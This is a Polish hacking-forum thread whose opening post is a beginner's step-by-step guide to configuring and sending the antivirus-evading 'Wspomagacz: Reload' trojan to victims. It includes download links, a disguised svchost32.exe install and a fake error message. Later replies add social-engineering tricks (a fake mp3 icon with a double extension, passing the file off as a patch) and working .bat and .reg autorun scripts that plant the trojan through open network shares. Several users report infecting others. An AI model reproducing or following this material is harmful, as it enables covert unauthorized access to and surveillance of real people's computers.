faq - instalacja trojana

d4rqu

Użytkownik
Dołączył
Czerwiec 6, 2004
Posty
7
Witam
Wiele osob szuka trojana ktory nie jest wykrywalny przez programy antivirusowe. W tym poscie opisze instalacje trojana ktory malo ze jest niewykrywalny przez m.in mks vir (baza danych: 7/6/2004), norton antivirus 2004 itd.. to jeszcze umozliwia "wlam" na kompa usera ktory nie posiada ip rutowanego, czyli jest "za Natem" (siec localna, ip 192.168.x.x lub 10.x.x.x). Tekst ten jest "ONLY FOR BEGINERS" wiec jak ktos sie troszke lepiej zna na kompie to nie musi tego czytac bo nie ma sensu. Dobra zaczynamy ...

INFO :

NAZWA TROJANA - Wspomagacz: Reload 0.39
STRONA WWW - http://www.wspomagacz.prv.pl
DOWNLOAD - http://www.wspomagacz.xlarge.at/Download/WR039.zip
PLIKI KLIENTA I SERWERU - klient.exe (otwieramy u siebie na kompie), konfigurator.exe (za jego pomoca mozna utworzyc plik serweru ktory wysylamy ofierze)

plusy trojana - niewykrywalny przez av, wykorzystuje siec gadu-gadu a wiec mozna wlamywac sie na kompa ludziom z sieci localnej, mase funkcji ...

minusy - lekko skomplikowana instalacja (juz nie wystarczy tak jak w standardowym trojanie wyslac userowi serwer i pozniej wpisac jego ip i connect=])

INSTALACJA :

Jest opisana w pliku txt w katalogu trojana ale jakby ktos mial klopot to niech czyta nizej.

Na poczatku polecam otworzyc notatnik, bedzie pomocny=]

1. Sciagnij trojana ( http://www.wspomagacz.xlarge.at/Download/WR039.zip ) i rozpakuj go.

2. Odpal plik -> Konfigurator.exe w katalogu z trojanem.

3. Na dole w okienku masz napis "Nowy", kliknij na niego.

4. Pojawi sie okienko "zapisz jako" - mozesz zostawic standardowa nazwe serwer.exe jednak ja polecam wpisac inna np. lamer1.exe.

5. Jak zapisales to teraz kliknij na "Połączenia", drugie od lewej na gorze.

6. Potrzebujesz numeru gadu-gadu ktory bedzie serwerem i bedzie wysylal informacje przez siec gg=]. Numer musi byc inny niz twoj standardowy. Jezeli nie posiadasz innego numeru to :

- kliknij na "Nowy numer Gadu-Gadu"

- wpisz dane, kliknij na "nowy" - pokaze ci sie numer ktory wpisz w polu "token"

- podaj dane ktore musisz zapamietac, zapisz sobie w notatniku nowy numer gadu-gadu i haslo, zaznacz sobie w notatniku ze ten numer jest serwerem (np. serwer1)

- na koncu kliknij na "wyslij"

7. Po prawej stronie w połączenia masz pole "mail". Nie jest obowiazkowe a tylko przeszkadza, jak chcesz mozesz wpisac :
ADRES - wpisuejsz swoj e-mail
HOST - dla onetu (smtp.poczta.onet.pl), dla wp (smtp.wp.pl) itd..
HASLO - wiadomo=]
LOGIN - wpisz login, jezeli kozystasz z vhosta albo aliasa to wpisz caly e-mail inaczej nie bedzie dzialalo

8. Na dole masz jeszcze dwa pola. W polu "zwłoka (sekundy) wpisz np. 10 a w polu "nazwa serwera" wpisz dla ulatwienia jakis tekst np. nick lamerka:p ktoremu tego trojana wysylasz=]

9. Kliknij teraz na "Odpowiedzi", trzecie od lewej na gorze.

10. Tutaj wpisujesz numer gadu-gadu klienta, czyli swoj. Jednak polecam nie uzywac swojego prawdziwego numeru gg, poniewaz wtedy podczas wlamu bedziesz musial wylaczac gadu-gadu a to jest klopotliwe. Nowy numer gg polecam pozyskac nie przez konfigurator-a lecz w programie gadu-gadu (gadu-gadu -> urzytkownik -> nowy itd..) Nowy numer i haslo do niego zapiszcie w notatniku, zaznaczcie sobie w notatniki ze ten numer jest dla klienta np. (klient)

11. W polu e-mail wpisz byle gowno=]

12. Teraz przejdz do pola : "instalacja", czwarte od lewej.

13. Jak masz uzupelnione to pole to nic nie wpisuj, jak masz puste to podaje standardowe ustawienia (mozesz wpisac inne) :

- Nazwa pliku i klucz w rejestrze (lokalizacja trojana : /windows, regedit)
-- plik : svchost32.exe
-- rejest : svchost32

- Komunikat o błędzie (taki bładu pokaze sie userowi jak odpali plik lamer1.exe)
-- Tytul : Windows
-- Treść : Memory error

14. Teraz juz tylko klikasz na zapisz (zapisujesz jako lamer1.exe) i dajesz zamknij.

15. I teraz wystarczy wyslac qmplowi=] utworzony plik lamer1.exe (jak wysylasz go mailem to lepiej go spakuj bo inaczej antyvir moze nie przepuscic) i prosimy aby na niego kliknol.

UWAGA WAZNE - plik lamer1.exe jest przeznaczony tylko dla jednej osoby dlatego nie wysylaj go kilku osobom bo wtedy beda bledy (gdy obie osoby beda kozystaly tylko z jednego numery gg serwera to trojan bedzie sie probowal polaczyc z obiema osobami na raz i bedzie to kolidowalo ze soba). Jezeli chcesz wyslac trojana wiecej niz jednej osobie to czytaj dalej ...
Musisz skopiowac plik lamer1.exe i kopii nadac inna nazwe np. lamer2.exe =], nastepnie musisz odpalic jeszcze raz plik "konfigurator.exe" i na dole w okienku masz napis "Wybierz plik", kliknij na lamer2.exe. Teraz zmodyfikuj ten plik zmieniajac numer gg serwera i haslo (bedziesz musial pozyskac kolejny numer gg, ktory polecam zapisac w notatniku i zaznaczyc ze jest to serwer2). Zmien tez pole - nazwa serwera (identyfikator) na ksywe innego lamera=]. Teraz zapisz plik. Aby przygotowac plik dla 3 lamera, kopiujesz i zapisuejsz jako lamer3.exe, pozniej modyfikujesz wpisujac nowe gg dla serwa i tak dalej .....=]

PODŁĄCZENIE :

1. Odpalasz plik klient.exe w prawym dolnym rogu masz przysick "połącz/rozłącz" - kliknij na niego i login podaj numer gadu-gadu i haslo ktore masz zapisane w notatniku jako "klient". Mozesz tez podac swoj numer gadu-gadu i haslo ale wtedy nie bedziesz mogl byc dostepny na gg.

2. Nastepnie w polu "lista serwerów" masz aktywny przycisk "dodaj" - kliknij na niego. Wpisz numer serwera ktory masz opisany w notatniku jako serwer1. W polu opis wpisz byle co, najlepiej nick qmpla ktoremu sie wlamujesz na kompa=]

3. W lista serwów powinien sie pojawić na czerwono numer gg serwera. Teraz musisz czekac na to az twoj qmpel kliknie na plik lamer1.exe ktory mu wyslales. Jak kliknie na niego to w prawym dolnym rogu ekranu dostaniesz komunikat a w kolumnie "Lista serwerów on-line" pokaze ci sie serwer na zielon. Klikasz na niego dwa razy. Jak zobaczysz jego adres ip po prawej to juz sie mozesz wlamywac. I to tyle !!!=]


----
Zachecam do komentarzy w sprawie powyzszego tekstu. Czy wam sie podobal czy nie? Jesli tak to moze jeszcze skrobne cos niedlugo. Tekst jest tylko dla poczatkujacych i jest w nim wszystko wyjasnione (az za duzo), a to z takiej przyczyny ze pamietam jak 4 lat temu zaczolem sie bawic trojanami, ircem, botami itd.. wszystkie faqi jakie widzialem byly z deka zawansowane i musialem sam kombinowac. Mam nadzieje ktomos sie przyda ten txt.

pzd
d4
 

Chochlik

Użytkownik
Dołączył
Styczeń 10, 2003
Posty
391
Teskt chyba latwy do zrozumienia... Ale, takie teksty dla poczatkujacyh moga sie okazac, pomocne lamerom, ktorzy chca komus niszczyc zycie psuc kompy itp. Jesli ktos chce sie uczyc hakerstwa to musi byc ambitny, ty byles i sie cos tam nauczyles, nie na wszystko sa FAQ i ludzie musza sie z tym liczyc. Ale milo z twojej strony ze chciales pomoc itp.
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
No faktycznie, chyba już jasniej się tego wszystkiego nie da wytłumaczyć
<
Tylko jeszcze jakby wszyscy zainteresowani to przeczytali...
 

Nereus

Użytkownik
Dołączył
Styczeń 3, 2004
Posty
22
Czy ja dobrze rozumiem? To już nie trzeba znać IP lamera? Wystarczy numer gg, (bo z hasłem gg to nie problem przecież )
 

Plik

Użytkownik
Dołączył
Styczeń 3, 2004
Posty
319
Originally posted by Nereus
Czy ja dobrze rozumiem? To już nie trzeba znać IP lamera? Wystarczy numer gg, (bo z hasłem gg to nie problem przecież )
ehhh ... ani ip ani hasla na gygy ... ;?
btw Nie no tego jeszce nie bylo faq na temat trojana ;/ [no ale swiat idzie do przodu ... ;];]] No ale sie przyda niektorym lamerkom .... :)
pozdrawiam ...
 

wspomagacz

Użytkownik
Dołączył
Maj 8, 2004
Posty
48
Wspomagacz

Dzięki d4rqu za ten FAQ!

Teraz jak ktoś się spyta o np.: konfigurację to dostanie link do tego postu.
<
 

miki818

Użytkownik
Dołączył
Czerwiec 7, 2004
Posty
11
a ktoś ma jakiś pomysł jak to podrzucić komuś bez wychodzenia z domu ..znaczy się jak go nakłonić żeby to wrzucił na swojego kompa
smile.gif
) ..
 

d4rqu

Użytkownik
Dołączył
Czerwiec 6, 2004
Posty
7
Mam kilka pomyslow.
1). Wyslac mu przez maila, umiescic na stronce lub wyslac mu w inny mozliwy sposob.
2). Jezeli gosciu nie jest lamka to musimy zmienic ikonke pliku exe. Polecam program reshack ( http://www.destruktor.sup.pl/get.php?id=reshack.zip ). Najlepiej zmienic na taka ikonke jaka maja pliki mp3 a nastepnie zmieniamy nazwe programu z nazwa.exe na nazwa.mp3.exe (osoby ktore maja wylaczone rozszerzene moga sie nabrac.

Sami pokmincie tez troche. I kozystajcie z okazji, np. jak ktos bardzo dlugo szuka jakiegos np. patcha to latwo mu wmowic ze to jest ten plik (a dotego narazie go antyviry nie wykrywaja ...)=]
 

NeC

Użytkownik
Dołączył
Maj 21, 2004
Posty
13
Originally posted by Chochlik
Jesli ktos chce sie uczyc hakerstwa to musi byc ambitny
Zgadza sie, ale naprawde trzeba pomagac lamom w nauce (oczywiscie jesli tej nauki naprawde chca (to pierwszy krok do bycia nie-lamerem
<
)) Bo niby taki "poczatkujacy" haker skad ma czerpac podstawowa wiedze?? Jak zadaje ktos taki pytania typu "prosze powiedzcie o co chodzi z tym NAT'em" to kazdy go splawia textem typu "poczytaj FAQ". A tam jest napisane, ze autor nie bedzie tego tlumaczyl, bo to jest oczywiste
<
I co wtedy?? I jestem za tym, aby bylo wiecej textow tego typu jak powyzej, bo sa dobre i zrozumiale
smile.gif
Pozdro
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
NeC masz rację, ale jak nie znasz takich podstawowych pojęć to nie sięgaj od razu do FAQ tylko do jakichś opracowań i sieciach, topologiach, bezpieczeństwie itd. itp. - tam to wszystko znajdziesz, a wszystkim H@x1orOm się tego pisać nie chce co tez mnie na poczatku wkurzało
smile.gif
 

miki818

Użytkownik
Dołączył
Czerwiec 7, 2004
Posty
11
już go komuś podrzuciłem..zrobiłem wszystko ok ale niechce sie połączyć z serwerem:(( to znaczy z ofiarą mimo że wyświetla że jest.. w dodatku klijent jesili go rozłączę nie da sie już połączyć przeba zamknąć okno i uruchomić jeszcze raz
 

dowcip

Użytkownik
Dołączył
Listopad 17, 2003
Posty
1
odpalilem ten serverek u siebie na kompie....i ??? Laczy sie z serverem GG ale z moim kompem nie.......dlaczego?
 

strife

Użytkownik
Dołączył
Czerwiec 10, 2004
Posty
8
mi wszycho działa ale mam pytanie czy nr klienta może być taki sam do kilku serwków i czy da się jakoś inaczej go zainsatlowac, bo z socjotechniką u mnie jeszcze kiepsko :/ a zresztą nie chce atakowac znajomych i chce to zrobić na jkimś przypadkowym nr, macie jakis pomysł :?:
 

Plik

Użytkownik
Dołączył
Styczeń 3, 2004
Posty
319
jak chcesz zrobic to omus innemu niz znajomemu to najlepsza jest SE [jak nie za bardzo u ciebie to cwicz ja ] wink ...
 

d4rqu

Użytkownik
Dołączył
Czerwiec 6, 2004
Posty
7
Originally posted by strife
mi wszycho działa ale mam pytanie czy nr klienta może być taki sam do kilku serwków i czy da się jakoś inaczej go zainsatlowac, bo z socjotechniką u mnie jeszcze kiepsko :/ a zresztą nie chce atakowac znajomych i chce to zrobić na jkimś przypadkowym nr, macie jakis pomysł :?:

Numer klienta moze byc taki sam dla wszystkich serwerow. Co do sposobu zainstalowania to polecam wrzucic plik na stronke jako super patch itd.. Na pewno ktos sie zlapie=] Jakbys mial jeszcze jakies pytania to gg 3335204=]
 

Dex1987

Użytkownik
Dołączył
Kwiecień 26, 2004
Posty
48
Ja wymyslilem taki sposób (tzn z pomocą arykułów na tej stronie i mojej wiedzy) Stworzylem plik *.bat i plik *.reg. Plik bat jak wam pewnie wiadomo zeby uruchamiał plik reg i zeby nie bylo pytania czy dodac inforamcje do rejestru ...

Plik *.bat wygląda tak

-------------------------
@echo off
echo. >>autorun.reg
regedit /s autorun.reg
-------------------------
A plik *.reg

-------------------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx]
"nazwa_wpisu.exe"="trojan.exe -auto"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce]
"nazwa_wpisu.exe"="trojan.exe -auto"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nazwa_wpisu.exe"="trojan.exe -auto"

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"nazwa_wpisu.exe"="trojan.exe -auto"

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce]
"nazwa_wpisu.exe"="trojan.exe -auto"

[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun]
"nazwa_wpisu.exe"="trojan.exe -auto"
-------------------------

To jes tprzyklad, zastosowan jest wieleeee, ja np zrobilem tak:
Mam bardzo dużą sieć i wiele osób ma w win XP udostepnione jeszcze standardowo dok. udost. Ja to wykorzystalek w nast sposob.

Plik *.bat
-------------------------
@echo off
echo. >>IP_gościaSharedDocsautorun.reg
regedit /s IP_gosciaSharedDocsautorun.reg
-------------------------

Plik *.reg

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx]
"nazwa_wpisu"="IP_gosciaSharedDocstrojan.exe -auto"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce]
"nazwa_wpisu"="IP_gosciaSharedDocstrojan.exe -auto"

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nazwa_wpisu"="IP_gosciaSharedDocstrojan.exe -auto"

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"nazwa_wpisu"="IP_gosciaSharedDocstrojan.exe -auto"

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce]
"nazwa_wpisu"="IP_gosciaSharedDocstrojan.exe -auto"

[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun]
"nazwa_wpisu"="IP_gosciaSharedDocstrojan.exe -auto"



Krótkie objasnienie. Wsadzam trojana plik reg i bat na kompa z udostepnionym na ful folderem u jakiejs lamki. kazdy kto wejdzie i uruchmi plik bat po ponownym uruchmieniu kompa zaladuje mu sie trojan. zyskujesz prawie calkowita anonimowosc. do zabawy polecam optixa super trojan funkcja socks ktora opisal ktos na forum zapewnia tez prawie calkowita anonimowosc:p No to tyle chyba, sory jak troche jest glupio napisane ale jestem strasznie zmeczony.

Pozdro i narazie
 

strife

Użytkownik
Dołączył
Czerwiec 10, 2004
Posty
8
zainsalowałem trojana ofiary ale nie mogę się połączyć pisze łączenie łączenie i nic, nie łączy
<
a wcześniej łączyło :/ teraz mogę tylko do 1 osby na 3 i na bank nie usuneli!!!
 

strife

Użytkownik
Dołączył
Czerwiec 10, 2004
Posty
8
Wysłałem serwek ładnie skonfigurowany poczta również ale działa wszycho oprócz wyslij plik bo pisze ze blad przy wysylaniu
<

Potrzebuje te pliki i co teraz mam zrobic :?:
 
Do góry Bottom